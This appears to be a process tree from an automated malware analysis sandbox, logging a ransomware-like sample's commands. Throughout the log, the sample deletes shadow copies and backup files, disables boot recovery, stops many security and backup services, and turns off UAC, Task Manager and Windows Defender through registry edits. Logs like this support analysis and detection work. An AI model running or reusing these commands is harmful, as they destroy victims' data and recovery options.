            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin Delete Shadows /all /quiet
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                    - Enumerates connected drives
                    - Interacts with shadow copies

        C:\Windows\system32\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB

            C:\Windows\System32\cmd.exe
                cmd: C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB

                C:\Windows\system32\vssadmin.exe
                    cmd: vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"3⤵
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"5⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"3⤵
-
C:\Windows\system32\net.exenet stop "masvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"3⤵
-
C:\Windows\system32\net.exenet stop "MBAMService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"3⤵
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"3⤵
-
C:\Windows\system32\net.exenet stop "McShield"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵
-
